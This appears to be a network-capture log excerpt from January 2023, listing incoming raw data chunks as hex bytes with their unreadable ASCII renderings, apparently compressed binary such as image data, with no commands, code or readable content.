                                                                                                                                                                                    2023-01-05 07:58:11 UTC6794INData Raw: cf 1b fe a5 fb cc b1 b2 e3 b2 30 37 9f aa 56 16 55 c0 5a 5b 40 e6 9e d6 bb 5d 2e bc 97 81 cd 2d 8e 7c c3 65 cf d9 fb 38 b3 6d df 43 8d 3a 94 5b e4 49 43 4c 86 c9 64 bb 9c 68 41 4b a2 7a 72 59 35 8f 6f 34 4f 93 e4 fd d1 e5 fd 25 dd 60 dd 76 9c 3f 07 fb 41 b0 4a 46 eb 93 b8 6e 39 8b 10 8b 22 24 49 9e 20 f4 0c 20 99 22 9d 15 0d 9f f3 3d d4 5e 8b f5 bd ad cb 57 07 52 6a a8 ab f9 4f 93 6d 9b 72 63 c1 b7 4d dd b2 93 19 89 25 24 40 18 51 81 ed c8 5d 9d c7 ed b7 48 4e aa 5d d3 ae 5a 64 55 73 5d 59 cf 92 e9 a3 48 fb 5f ba ed 3b 6f 8d f7 63 59 31 d5 01 0f 13 c4 d1 a3 11 51 50 cc 9f be c0 dc 97 ab 3b 51 ec 97 db af a0 ec bb bb 51 b5 0b c4 c3 26 1a dd 49 c6 0f 2d c8 f1 1d a8 c1 e3 d0 c2 6f dc 58 26 34 a8 68 22 96 99 5d d6 91 48 76 fd 89 16 25 42 dd 2f 71 5e 0a ba cf
                                                                                                                                                                                    Data Ascii: 07VUZ[@].-|e8mC:[ICLdhAKzrY5o4O%`v?AJFn9"$I "=^WRjOmrcM%$@Q]HN]ZdUs]YH_;ocY1QP;QQ&I-oX&4h"]Hv%B/q^
                                                                                                                                                                                    2023-01-05 07:58:11 UTC6810INData Raw: a4 75 59 f2 15 16 38 d7 1e db 9e 08 f8 b3 06 59 0f ba df 6d d4 6d 7c d5 b2 2a ce ba 9a e4 7d 0a 0c 3f 57 b0 ec 39 15 c7 79 ce 6b 18 99 5c 30 10 84 55 93 bc 56 94 25 d0 fe db 82 ab d0 d7 7e 9d 67 47 0a 59 8c 34 87 f8 b0 ed 7b a6 d9 89 8f b8 19 f2 b6 b8 9d 9b 0a 19 22 0b 18 9c d0 4a 94 8b f7 08 4b d5 a8 65 65 bb b9 ca dd 76 53 27 15 05 d3 2d 5b 5e 06 24 0c 91 d1 84 3d 08 0a b9 60 ab 75 c4 b5 c6 e5 63 d5 6f e5 ab d9 b2 56 a5 07 62 c1 dc fc e7 7c 77 ce dc 25 c2 d9 21 96 49 5a 59 a5 2a 56 35 91 95 bb 01 b8 48 e8 16 ce 9e 09 f3 7c 1b 2b d9 ec 52 b5 d7 53 53 6d ab c4 4e 2c df d3 a5 cb 59 e1 8e 33 8c d2 65 ca e1 cb 13 73 d2 a0 32 db d2 ff 00 a7 95 9a ea ae 39 73 2c bb 68 a2 ef 52 c1 b1 e1 60 63 c9 83 06 e3 06 14 84 ce 65 36 b5 ac d7 86 86 fb 94 3f 34 40 bd 15 af
                                                                                                                                                                                    Data Ascii: uY8Ymm|*}?W9yk\0UV%~gGY4{"JKeevS'-[^$=`ucoVb|w%!IZY*V5H|+RSSmN,Y3es29s,hR`ce6?4@
                                                                                                                                                                                    2023-01-05 07:58:11 UTC6826INData Raw: 56 4c 55 69 6c 90 20 26 20 e0 11 79 a3 14 32 14 6a 33 0e 2e 8b ab be dd a7 16 45 2b 6e 5b 10 db 1e e5 ba 09 1e 3d ad 0c f1 77 1c 82 c2 e5 92 c0 6b 45 af 10 2b 7d c3 91 e1 aa 59 71 5a 86 8b 3e 76 f9 bc 05 83 1a 78 3e 9d 9f ab 21 e3 7a b4 a4 29 2f 6d 0d b1 a1 53 d5 1f a3 2d 2e d5 15 b4 21 96 7d 9b 1d 66 db a7 8e 3f da c6 94 46 d7 52 80 12 c0 86 21 89 5e 1f 35 a6 fd 6d 8e dc 65 91 1c 8b dc bb 34 fb 6e d3 85 8d 86 71 37 0c 98 9a 49 5c 92 d8 a0 46 ce ee 91 87 55 6b 72 19 0d 8c ee 1e ee 90 c4 52 ed 73 db 23 c9 b9 d8 aa a9 b1 55 f0 9f 13 de fe e3 4d 93 8b 97 8c 98 df 4d 94 27 5c 79 12 e8 f8 15 94 c6 54 8a b1 78 45 b5 6b 51 d5 79 83 ad 5e 58 a9 4a e3 97 23 fd ff 00 60 dc fc 83 78 bb 7b c7 c6 66 48 be 8f f6 cb 2a 0b 8b dd 8f 6b 06 09 12 c5 68 45 66 6f 6b 91 ad 7f
                                                                                                                                                                                    Data Ascii: VLUil & y2j3.E+n[=wkE+}YqZ>vx>!z)/mS-.!}f?FR!^5me4nq7I\FUkrRs#UMM'\yTxEkQy^XJ#`x{fH*khEfok
                                                                                                                                                                                    2023-01-05 07:58:11 UTC6866INData Raw: f3 d0 47 85 34 d3 e7 63 20 95 90 8a 77 14 5f 27 b5 d5 57 f7 1b 82 b8 6b 9a eb 75 cc 9e 89 af 7b fe 21 a2 97 e1 5e 3b 36 e1 e6 04 49 92 5b 19 2e cb 78 8d c7 22 55 91 a8 b0 c8 45 0c d1 a7 0e 25 bf 6d 78 05 d7 17 6b 99 e7 7c e1 af fc 8a 2d cb d7 dd 19 a7 ce da 9f 68 db b2 20 c4 85 f2 17 1d 48 49 5d 94 af 5e 51 67 a1 54 e8 eb 0f 23 7b 51 a3 5d 7b 37 7e e2 cc c2 bc cb 7e ce f1 1c b9 36 d8 37 ac b8 26 c8 02 6c 94 65 50 24 0e a4 04 2b 14 76 91 28 b5 aa 68 94 a1 b5 ee e9 da b5 94 ce 79 e2 46 78 bf 98 36 02 c9 36 63 49 90 f1 93 3c ae 71 cc 8d 30 01 56 38 d6 48 ff 00 ca ed aa b3 28 75 58 85 b4 af 1d 6d 48 b6 fa 41 8f 27 3a 1a 26 dd e5 3b 77 92 36 6e 16 44 93 62 4b 24 2b 10 76 c7 c9 9f 21 e2 c8 0c 1c 22 42 8a 3b ac 08 55 bb a5 54 bd b7 db 76 ba a9 87 95 97 f1 2f ea
                                                                                                                                                                                    Data Ascii: G4c w_'Wku{!^;6I[.x"UE%mxk|-h HI]^QgT#{Q]{7~~67&leP$+v(hyFx66cI<q0V8H(uXmHA':&;w6nDbK$+v!"B;UTv/
                                                                                                                                                                                    2023-01-05 07:58:11 UTC6882INData Raw: be 4c df f7 e6 e1 93 bf cd 12 41 91 23 10 30 49 79 26 92 58 4d 81 63 50 a1 25 bd 94 01 6b 3c 6d d5 c5 ba f5 c3 f5 0b e4 c9 75 c3 45 b3 34 c3 44 94 b6 5f b6 0f ba d8 fe 53 85 93 14 38 0e 98 9b 7c 06 47 8d f2 02 ac 92 28 a3 46 e6 cb d5 14 d5 6a 95 f4 34 d7 9d 7c b4 c5 6e 2d b5 ef fe 07 a0 b2 72 53 04 32 f9 5f 99 f9 36 cb 9a 36 09 b1 36 9d c5 19 59 ce 54 74 0a 87 82 88 f8 12 24 2a 2b 73 40 ec 7f 8a b6 be 9f b0 cf 6b d6 17 4f 13 cb cc 94 cb 21 bc 6f 6f da 77 6d b6 2c af 2b db 77 4d f7 73 50 eb 2e 46 64 a3 2b 1d 5c 29 37 63 45 51 1a 2b 1f 67 77 1d 64 a7 1e ae 5a f4 2d dc 55 2f 3b fb 7d c6 3e 9d 9e b5 44 0f 92 79 8c 7b 46 08 c0 f1 39 72 20 c4 ba d7 59 6e ba 6a 1a d5 e9 45 5b 3d a2 35 0a 2d 5f 6f c7 cb cf dd 25 ae 36 4a c6 df c4 78 c0 f3 89 fc 6e 53 93 8f 2b 2b
                                                                                                                                                                                    Data Ascii: LA#0Iy&XMcP%k<muE4D_S8|G(Fj4|n-rS2_666YTt$*+s@kO!oowm,+wMsP.Fd+\)7cEQ+gwdZ-U/;}>Dy{F9r YnjE[=5-_o%6JxnS++
                                                                                                                                                                                    2023-01-05 07:58:11 UTC6938INData Raw: 14 02 fb 4d a1 50 31 ed f7 19 ee fe 6d 73 72 4f 54 54 b8 e6 78 f6 df 95 8b 26 5e 52 49 92 63 85 8b 85 92 f2 6a 0b 54 ac 64 ac 8f 5f 6b b2 35 bf 0b 42 ea c9 c9 43 1a db 23 cd ba 48 f2 81 ed 95 57 95 66 e0 ac 47 15 bc b0 e7 e8 bf 9e ad 77 e0 5d b2 7b 27 7e cd c6 cc 19 f8 d0 2e 44 6b 08 34 77 69 2c 56 1d 40 b0 b7 87 55 ae 00 1c 3a 4f 2d 52 b5 f1 2a 99 07 b9 6e 6f b9 ca 99 59 f1 d2 10 04 6e b1 56 30 51 49 e9 63 fa 92 bc 09 d6 bc 63 62 d0 7d 15 f6 5b ed dc 9b 96 eb 0e ed 93 8b 22 c0 91 14 63 7d 07 6a c5 68 dd 44 85 65 b9 c9 09 c6 e8 dd 7a a8 35 4a e2 79 a5 57 72 79 2c 6e 6c 58 bc 93 73 fb 73 87 bc e5 ee 8b 83 1e 1e 5c b9 34 43 6a b2 c9 34 20 15 99 63 47 e8 c6 32 f2 68 ff 00 e6 23 33 f1 e9 d7 95 6a bf 15 a6 96 aa f1 3a 3d 5a b1 a6 f9 b9 4f bb e1 ab c1 9f 8b 26
                                                                                                                                                                                    Data Ascii: MP1msrOTTx&^RIcjTd_k5BC#HWfGw]{'~.Dk4wi,V@U:O-R*noYnV0QIccb}["c}jhDez5JyWry,nlXss\4Cj4 cG2h#3j:=ZO&
                                                                                                                                                                                    2023-01-05 07:58:11 UTC6946INData Raw: 42 eb 24 52 63 49 64 61 23 03 db 18 e8 ed 4a bc 08 ea 6e ae 14 b8 6b b7 0b c7 89 e8 b8 f1 e9 d0 ca f4 1e 61 61 45 b6 6d e6 2c 25 95 67 7a 4d 12 ce dd d5 80 cb 41 44 6a db 62 4b c5 ad b7 f4 da e7 5d 19 32 ab 3f 61 9a 45 2f 7f dd b7 a1 9a bb 6e 56 51 8d 18 03 dc 52 d0 85 77 6e 32 1e e1 66 8d 6a 3f e0 03 e3 ac 34 6f 42 1b 72 49 e4 fd d5 3b 26 f6 4e e9 94 77 46 8a 34 22 78 db b3 23 b9 02 e8 d9 e3 ac 46 9d 4b 7d 97 5b f8 eb 47 87 9d 95 a7 ee 34 4c 67 bf fd d1 db bc 92 61 0e 04 33 e3 e5 bb 01 1c 8b 2a 3f 06 2b fb 64 3a f5 2f 06 6a 2b ad d2 95 62 de 9a db d3 e3 a9 11 c8 bb 6c 9b ce f8 b9 d1 ed fb 5c d2 45 bb b9 06 59 e5 8d 61 86 38 64 16 96 91 23 bd 9a 42 78 f4 5b fa aa 35 a7 6f dd da da d2 23 61 7c 29 7c 45 d7 63 6c 4f 06 7c 91 8e c9 26 5a dd 2b cd 2c 85 e8 ee
                                                                                                                                                                                    Data Ascii: B$RcIda#JnkaaEm,%gzMADjbK]2?aE/nVQRwn2fj?4oBrI;&NwF4"x#FK}[G4Lga3*?+d:/j+bl\EYa8d#Bx[5o#a|)|EclO|&Z+,
                                                                                                                                                                                    2023-01-05 07:58:11 UTC7002INData Raw: 55 a2 dc a3 73 11 fb 81 f7 0f 69 f3 1d a5 66 db 71 e6 9f 22 19 e4 92 69 dc 15 68 62 63 64 71 f4 0b 64 56 20 48 ec c4 24 7f 21 25 8e ab 92 32 2f 6f f2 f0 30 bd a5 15 5f 0a 83 75 f2 f8 f2 b0 f6 f4 4c c8 40 78 da 25 05 0b 28 03 a8 4e ff 00 b7 5b ad e2 4b 7a d8 b7 5b ae 3c 5d 82 be 54 92 6e df 16 8f e1 31 9e 2a 59 ac 6d 5b 16 66 2e c9 8f 16 7e 64 70 08 c5 23 c6 5c 64 49 54 a0 0d 23 f7 25 32 12 59 de 85 84 2b 7d 7a 9b 5d dd 9e 35 c5 bb d5 d6 ed b5 e7 f8 b8 d7 6e 3e c3 6f 6a 2b 56 6c 58 18 b9 18 38 03 ff 00 d5 96 55 94 07 a3 ca ec 97 14 bd e8 50 5a 03 3f 66 ca 86 03 4e e7 12 b5 62 bf e2 39 0d 31 7c ea 3d 98 6d 39 bb b4 b8 ac 62 53 19 c7 54 22 40 8e a1 95 89 88 12 12 2e 0a 03 d1 9d 59 97 ae 86 99 f6 8e d6 a4 bf 86 af 8f f9 8a 73 d4 e7 8b 37 8b 79 5e eb 97 bc ec
                                                                                                                                                                                    Data Ascii: Usifq"ihbcdqdV H$!%2/o0_uL@x%(N[Kz[<]Tn1*Ym[f.~dp#\dIT#%2Y+}z]5n>oj+VlX8UPZ?fNb91|=m9bST"@.Ys7y^
                                                                                                                                                                                    2023-01-05 07:58:11 UTC7018INData Raw: b2 a6 65 b6 7d c9 c3 c5 dd 25 ca c1 05 f6 c7 ee 16 44 6b cb d1 89 ee 20 a9 11 b3 b7 16 5e 80 3d 9e ed 73 2c ca 49 83 48 dc fc 9f 17 0f 64 7d ea 27 43 08 8f b8 0b b2 8a 2b 7b 59 83 32 01 43 c5 95 9d 0d b7 7c da e9 9d 24 83 30 c8 de 5f c7 e6 c9 f2 73 85 f5 7f d4 da 38 06 6e dd 2b 2a 77 82 d5 ac b8 3c 90 c7 34 8b 12 96 20 f1 0f d6 eb 4a f0 da ca 8f 94 39 7e 05 e2 4b bf 81 79 3e d3 bd 77 f0 f1 ce 5c 5b a4 07 fe a7 1b 3a 59 24 99 08 36 9a 33 9b 4a 83 cf b6 16 95 17 2e ba 31 65 57 5a 7e 65 5a 82 e9 ae 82 03 40 1a 00 d0 06 80 34 02 68 03 40 2e 80 4d 00 ba 00 d0 09 a0 0d 00 68 03 42 43 42 03 42 43 40 1a 00 d0 06 a0 06 a4 06 a0 06 80 34 01 a1 21 a1 01 a0 0d 00 68 03 40 1a 12 26 80 34 01 a0 0d 00 68 03 40 1a 00 d0 06 80 34 01 a0 0d 00 6a 09 0d 08 13 52 03 40 1a 12
                                                                                                                                                                                    Data Ascii: e}%Dk ^=s,IHd}'C+{Y2C|$0_s8n+*w<4 J9~Ky>w\[:Y$63J.1eWZ~eZ@4h@.MhBCBBC@4!h@&4h@4jR@
                                                                                                                                                                                    2023-01-05 07:58:11 UTC7025INData Raw: ea 1c 75 c9 9b 35 6d 68 ac b5 ee 2d 8d 38 d4 d5 d7 03 0f c2 77 8d c7 ca 73 5f 1f 6c d9 37 13 0c 4b 04 65 2a 64 2a 6e c9 92 82 f5 49 08 b1 60 88 b7 6f fc df 98 db 57 a2 97 a2 36 98 26 3c 6b cc 36 1f 20 83 2b 23 6c 97 bf 3c 68 66 21 a1 78 c3 2a 83 d4 a2 45 17 28 1e a0 dd ac 16 4a c3 6b 56 5d 39 21 77 7f 3e f1 a8 f7 3f e9 f9 ae ad 2e 13 a4 84 12 b6 23 72 53 d6 6d ee 80 4d b6 fe af 97 dd ac 5e 74 df 17 ef 21 d9 22 95 85 e3 b1 27 91 e6 6e f8 7b 93 49 8b 94 f0 cf 37 71 d0 30 01 da 49 6f 75 3d b6 26 42 6d 5b 55 56 2e 9b ee e0 7a ab 0d f9 7e f2 89 a9 36 7d e3 7e db b6 7c 27 dd e6 91 17 6e c3 49 1c 94 e0 1b b6 a4 b0 8c 80 2f 6e 43 a6 ba b5 ed 0f 4d 8d 26 11 87 fd aa 6d cf cd fc 93 70 de e6 8a 18 44 6e ca 61 ed b2 95 79 7a d4 a4 bd 41 99 6c 51 57 62 f6 fa 85 d7 1e
                                                                                                                                                                                    Data Ascii: u5mh-8ws_l7Ke*d*nI`oW6&<k6 +#l<hf!x*E(JkV]9!w>?.#rSmM^t!"'n{I7q0Iou=&Bm[UV.z~6}~|'nI/nCM&mpDnayzAlQWb
                                                                                                                                                                                    2023-01-05 07:58:11 UTC7068INData Raw: 6c 7a 9e 06 b4 fd b2 5c ff 00 ed b5 35 f4 4f 15 33 2e 55 d1 2d fd e7 3a bb c7 a3 31 0d d7 6a f2 2f 29 f3 46 42 91 2c 2e 91 76 ea 14 44 c8 b4 64 2c 38 87 66 1c 1f f2 a7 cb af 92 ee b1 ba e4 49 57 59 fc bd a5 e5 dd 9d 3c df c5 67 dd 77 a9 36 b6 5c 55 9a 10 31 9d e2 9d 7f 6a 40 4b 45 72 da cd 63 20 70 54 0e 92 29 77 b4 eb af 2e 39 7a 2d 7f 20 d1 9c 65 64 e7 e0 78 fb e6 64 67 9c 55 86 83 0e 22 e9 49 6a 45 e4 27 bd ad 46 e1 68 ee 35 c2 9d 2b af 3b 8d f9 aa 71 9a bd 6d ec 08 6b 1f 8d ef 18 5b cc 49 bc 46 b1 32 88 9c 85 68 e9 02 93 d3 d6 4a c0 24 93 81 60 f2 25 c3 a3 86 bd 07 11 c5 12 94 1f 4b 6e 9e 46 7c 8d 44 c9 15 d1 49 11 18 d4 21 82 77 1a 81 d1 50 32 93 4e 8a ab 30 b7 d8 da e9 b5 14 ab be 9f 0f de 6d ca 74 2b 7b a7 92 60 ef fb 9a 6d d8 63 1e 1c b3 4c 74 fa
                                                                                                                                                                                    Data Ascii: lz\5O3.U-:1j/)FB,.vDd,8fIWY<gw6\U1j@KErc pT)w.9z- edxdgU"IjE'Fh5+;qmk[IF2hJ$`%KnF|DI!wP2N0mt+{`mcLt
                                                                                                                                                                                    2023-01-05 07:58:11 UTC7192INData Raw: 27 a6 b6 dc 7b 97 9b ba e4 b1 ed 27 f0 d7 9f 97 0d b0 a5 6a 6a c8 f5 b9 7b 07 be 0d ba 6c 9b 3b 64 c3 3a 34 99 52 05 31 f4 df fb a8 ce ad c7 9a 25 a5 59 9f fd 9a e9 f4 dd d4 5b c0 a5 6e 6a 53 f9 f6 f6 c9 8e 46 e0 64 c8 c7 02 44 57 ab 44 1f 8d bd c1 40 26 ea 23 df e9 f1 5d 74 60 bb 75 6a 36 d9 db 76 5a f3 56 5d 3c 03 ef 0e d1 e4 18 47 1f 79 cd c5 87 7c 84 ce 67 15 b1 5d 63 21 49 46 24 a3 56 ee 11 ab 5c cc 87 a7 86 b5 b4 b5 af de 69 5c 88 a9 f9 ff 00 9f bf 96 c1 99 b3 e1 08 d6 0d bf 20 4a ae b7 48 99 1d ba a9 e0 df f2 8f 17 b4 21 6b f5 c4 b2 5a ed d6 9a 47 db f0 32 bd a5 14 6c a8 d7 23 1f 09 71 b0 3b b1 e4 39 74 c8 55 71 49 17 83 46 7b 9d 5f b2 dd 35 0d 6d 47 58 d6 36 f5 32 2e 39 3c bf cc af 4d 06 db ae cf 07 8c e7 43 bf e6 97 3b 54 58 71 65 e6 42 86 32 66
                                                                                                                                                                                    Data Ascii: '{'jj{l;d:4R1%Y[njSFdDWD@&#]t`uj6vZV]<Gy|g]c!IF$V\i\ JH!kZG2l#q;9tUqIF{_5mGX62.9<MC;TXqeB2f
                                                                                                                                                                                    2023-01-05 07:58:11 UTC7200INData Raw: 78 fe 1a 89 40 81 f2 7d c3 12 08 5f 13 26 2e f2 2c 6d 34 c2 a9 48 d1 69 46 65 72 b7 54 b0 e0 35 e1 f7 f9 ab 64 f1 ea f4 e4 e3 a1 be 35 1a 94 a3 f7 47 1b 3b c7 64 c2 90 4b f5 19 24 62 29 60 91 12 08 15 92 aa cc 55 47 c8 dd 37 2f e4 da f1 3b af a8 d1 e2 75 5f fd 91 15 fe df b8 e9 49 d5 fb 0a 7f 83 ed 59 cb e5 59 b0 27 6e 4d af 1c 4b de 36 bb 63 c9 8a b7 09 52 f1 d5 2c 6c dd 54 56 32 bb aa f0 e7 6f 91 82 b6 ac 36 e7 4f 37 b4 ea ad 0b 27 84 ee 5b 56 cf 22 b6 3e 69 c8 19 c8 f0 63 15 66 88 63 46 8c 85 22 8f ea 0d 82 46 7f f3 0b 5f 71 fd bb 99 45 47 ad da 77 35 9d 6d fd c5 32 3f 03 4c db a2 dc 1a ff 00 ac ca 19 38 ed c2 c9 20 54 75 23 98 7b 4d 8d ff 00 0f e5 af ad c3 67 6d 66 51 e6 59 43 23 bc 9b c6 20 dc 31 93 2b 04 43 8b b9 61 3f d4 63 4d 6a aa 07 4e 25 65 e1
                                                                                                                                                                                    Data Ascii: x@}_&.,m4HiFerT5d5G;dK$b)`UG7/;u_IYY'nMK6cR,lTV2o6O7'[V">icfcF"F_qEGw5m2?L8 Tu#{MgmfQYC# 1+Ca?cMjN%e
                                                                                                                                                                                    2023-01-05 07:58:11 UTC7216INData Raw: e6 e2 4d cc 0b 0e 90 79 28 fc 35 7c 74 92 37 3b f8 7f f4 49 32 f0 66 48 de 7c d5 ca 8d 64 49 0a 58 eb 25 55 4c 75 1e e4 6a 37 5f fe 7a c7 27 2a bf 64 1b 56 0f a0 b7 bf 0a db ae 8f 7b c1 40 32 f3 90 46 a3 8a ab e3 63 8b a5 c8 96 65 54 44 99 64 34 a1 ea 99 6d 53 5b 6e 3e 7a ca f4 5f 81 d3 64 8c 7b 6a f2 dc 5c c1 1b e4 c2 fd a5 b4 f7 16 8e d7 06 aa 32 c4 45 c5 59 7a 64 ea bd bd 35 df 0c e1 1d 6e fe 50 ae eb 87 b3 34 79 13 bb 21 33 14 60 81 01 bb b3 67 ba ff 00 74 6e 4a f4 fe 3a b5 14 3d 4a b6 50 3c 9b c8 f2 f7 49 17 1a 10 62 c7 86 aa 22 a8 66 a8 25 58 b3 0e 0c 18 70 34 e8 a0 d7 6d 2b 04 c4 92 bb 1f 95 36 6c d1 41 bd 4b 23 61 ab f5 20 a0 8c 35 82 25 91 c5 38 aa 8e 74 e3 eb aa da 53 d0 a4 41 a4 f8 87 89 ec 4d 1e 47 d0 53 2a 36 74 3d c8 ed 66 a4 be d4 3f 3a 22
                                                                                                                                                                                    Data Ascii: My(5|t7;I2fH|dIX%ULuj7_z'*dV{@2FceTDd4mS[n>z_d{j\2EYzd5nP4y!3`gtnJ:=JP<Ib"f%Xp4m+6lAK#a 5%8tSAMGS*6t=f?:"
                                                                                                                                                                                    2023-01-05 07:58:11 UTC7232INData Raw: 28 d3 1e 17 12 4b 9a 28 d3 e2 28 9a 90 a1 18 9c 55 09 59 d9 9c c1 db b5 1f e5 6b 6e d7 33 54 d5 19 53 cc 69 9b 57 da 7c 5c 7d a0 3e 4a 26 d5 9d 21 03 35 30 1b b9 8c 7b 8b 64 e2 25 9e eb 12 51 d4 c5 00 f8 fb fa b5 f3 d9 32 2b da 5e 8b c0 f5 69 48 43 8d bb ed 07 83 6c 38 3b 8e 36 df 13 40 f9 99 70 06 98 d0 22 b4 4d 72 aa 70 26 34 60 64 0d 69 fd c5 6e ad 65 9a b5 c8 9a 7e 2b 72 52 82 2b ee 2e 7e e9 b6 6e 9b 6e 26 cf b5 63 e4 ed ab 1c a2 63 24 68 b1 c1 24 57 aa 3c ae 55 e2 a2 23 22 c2 26 1e e9 1b b7 ca 9a a3 85 58 4a 03 5e 07 ce be 6a b0 78 94 78 b8 d8 78 f2 a6 66 4e 1b c5 90 7e a4 95 12 16 1c 6e 1c 1e 85 ba 97 a7 f3 1e 9e 3f 69 5c 8d db 9e 95 4f cb ed fe e3 9a f0 8a 01 dd f7 bc c8 67 c3 6c f6 55 65 68 c8 9e 4a db 1b 00 ae 88 4f 28 dd 55 56 44 4f 78 e9 e3 af
                                                                                                                                                                                    Data Ascii: (K((UYkn3TSiW|\}>J&!50{d%Q2+^iHCl8;6@p"Mrp&4`dine~+rR+.~nn&cc$h$W<U#"&XJ^jxxxfN~n?i\OglUehJO(UVDOx
                                                                                                                                                                                    2023-01-05 07:58:11 UTC7235INData Raw: 8b 7d 35 85 ab 05 64 a6 61 6d 79 39 58 a1 92 02 b0 56 c0 d4 e1 c4 d6 80 d0 55 85 78 ff 00 7e b0 bd c9 e2 cd d7 ff 00 8f e9 b9 f8 fe 64 fe 45 8b b6 65 6e 51 61 92 81 30 e6 54 91 64 64 36 bd af 41 34 7c 6d 75 bb a7 df d5 6d 35 92 b2 5b ff 00 81 be 3a b3 e8 69 3c ff 00 27 6c c5 ae e5 84 eb b8 1c 03 3b c2 ce 12 c7 21 80 43 c0 f2 2b f2 d2 da fe ad 78 fd d7 d4 2b 83 22 ad 93 7c 97 dd af 89 d7 d0 e9 e3 19 63 ee 16 db 06 e3 23 41 2c 0f 55 5c 70 94 8c 44 40 59 14 96 ba 4b 82 fc a4 8f 7f eb e3 ae 9c 19 1e 45 aa 5e 11 d0 34 65 5e 7d f6 c3 fa 3e cc 72 fc 7a 13 91 3e 26 7b 4f 13 19 03 07 c5 92 91 8c 7a 30 ee 4e b6 f4 c6 97 5c 1d ae 90 eb b3 16 35 8f 55 e2 73 de a6 63 e5 1e 63 8b b3 e1 4d 8d 13 4a db b2 9b 4c 0d 11 55 11 d4 37 53 10 63 aa 95 ed 70 2d f1 d7 a3 58 8d 59
                                                                                                                                                                                    Data Ascii: }5damy9XVUx~dEenQa0Tdd6A4|mum5[:i<'l;!C+x+"|c#A,U\pD@YKE^4e^}>rz>&{Oz0N\5UsccMJLU7Scp-XY
                                                                                                                                                                                    2023-01-05 07:58:11 UTC7251INData Raw: ee 86 3c 15 68 6e 2f c0 d9 4e 9a 73 3e dd 73 5a fc 75 67 53 68 f9 f0 c7 b0 fd d6 f2 5d cf 71 de b2 73 9e 27 fd a8 7e 9d 9b 0e 3f a5 42 7b 29 3a a5 d2 49 2a 8e 22 f6 7d 65 5e e3 93 85 a1 45 64 c7 5e 3b f6 bb 6c f0 94 cd dc d8 fd 36 cf 11 1d bc b8 ed 79 62 8c d5 9a 69 ea 0b f0 b9 22 f4 05 bd 39 6b 47 7b 36 d3 7a 15 e3 d4 f9 df 3b 79 dc a1 33 43 8d 99 32 99 8d 66 ed 19 00 7a 9a a9 91 13 a8 06 f7 71 1a 63 70 73 c4 9c f6 6d d8 cd 9b 04 bb 94 f2 f6 61 35 90 02 4b ad 7f 4a 31 5e a5 60 0f cb f9 eb 4d 8a 44 6e 32 8a 23 f5 e3 1e 59 1e 69 ea ce f2 f1 6e d8 f9 58 b7 4d bd 46 d7 66 23 9d 3f 0d 6a d3 89 35 ab 36 2f b6 bb cf 95 78 96 03 61 f8 96 3c 72 be e3 98 15 8e 5a 34 85 5d 31 c1 b6 50 9d 4c 1e 32 b2 42 05 81 01 6e e7 ba 9a ea c1 dc a5 e5 8d c8 be 26 f5 2e 90 66 49
                                                                                                                                                                                    Data Ascii: <hn/Ns>sZugSh]qs'~?B{):I*"}e^Ed^;l6ybi"9kG{6z;y3C2fzqcpsma5KJ1^`MDn2#YinXMFf#?j56/xa<rZ4]1PL2Bn&.fI
                                                                                                                                                                                    2023-01-05 07:58:11 UTC7267INData Raw: 24 f5 76 d4 86 e2 0a 2a c6 87 8f ea 5b a8 75 f1 ef 06 44 df 0e bf 0f f9 4c 65 32 8f f7 3f 6e 8b b0 33 30 96 08 1a 2e db a2 bb 58 d2 0a b5 7b 74 e2 b2 47 5b 6c a1 2c 38 53 5f 4b d9 e0 b6 28 e5 e6 95 af b1 fb 4a bd cb cf d8 ff 00 b7 f2 ee b0 e6 19 73 de 17 9e 34 95 a0 55 23 99 2c ac c5 29 69 b8 7e 0e de 83 5d b8 f3 5b 2d ad 45 e5 54 ff 00 71 a6 38 5a b4 6a 72 41 99 b6 11 9f ba e4 1f a5 c3 15 11 46 ae 15 d1 68 bd 4c 7d b7 35 2e 4a 5f ca e6 e3 ae 1b 56 d4 b7 ab 92 da 57 e5 53 c4 d1 ae 83 e3 b8 79 77 90 ee 2b 16 da bb 74 31 e3 c2 25 91 25 2c c1 04 c7 82 f7 63 24 de aa b7 f6 eb 6a fc 35 d5 4c b6 ca da 49 7e 3f ab fa bf 91 52 ab f7 ab 09 f7 c9 c6 0b 67 88 04 8b 44 c5 64 76 06 42 b6 76 a0 96 12 9d b1 30 22 fe f0 9a d6 17 2d b5 91 75 d3 95 ab 38 fc 3d e1 a2 08 6d
                                                                                                                                                                                    Data Ascii: $v*[uDLe2?n30.X{tG[l,8S_K(Js4U#,)i~][-ETq8ZjrAFhL}5.J_VWSyw+t1%%,c$j5LI~?RgDdvBv0"-u8=m
                                                                                                                                                                                    2023-01-05 07:58:11 UTC7272INData Raw: 99 94 a8 20 96 d9 dd d5 a5 75 32 dd db 62 15 aa 86 8a 2d e9 65 b9 29 c1 b5 9b c9 5a 38 bf 98 db d3 6d 11 1b cc d0 a6 66 dd b4 ed 58 73 60 ed bb 7e 3e 4a 43 2a 64 4a e0 b4 f2 2f 7d 66 ed 94 a4 8e 94 e3 5b 99 a9 f2 a0 a4 7e e1 44 57 ca 65 e9 98 ce f2 70 bc 3b 7e 9c 6c ff 00 53 3e df 1c aa 92 cd 31 b6 4e e1 8e dc 86 f5 bd 04 97 d8 cd ef 4f 7f bb 58 d9 2b 5b 46 37 dc bc 0d b7 c7 f2 db 2d b7 04 39 78 90 e1 0d ca 2e cc e0 77 56 42 31 b1 07 70 28 29 74 ae 5d d6 cb 97 b5 67 cd a9 f4 dd 25 db 64 69 6b 28 d3 72 14 63 e2 6d 7b 16 37 90 6e 38 28 31 b3 32 be 8d 1c 3a 98 91 a0 37 4b 1f 65 5b bd 09 b0 3d c5 aa d5 6a d4 57 5e 1e 6e d3 3d 9f 3a bf 26 be 5e ad 99 d6 c7 5f 25 f1 8f 0e f2 2f 22 db 53 c7 72 5b 1b 6c 38 b2 cf b8 de c6 53 04 50 d2 e9 50 3d 19 9e 45 aa 2a 75 80
                                                                                                                                                                                    Data Ascii: u2b-e)Z8mfXs`~>JC*dJ/}f[~DWep;~lS>1NOX+[F7-9x.wVB1p()t]g%dik(rcm{7n8(12:7Ke[=jW^n=:&^_%/"Sr[l8SPP=E*u
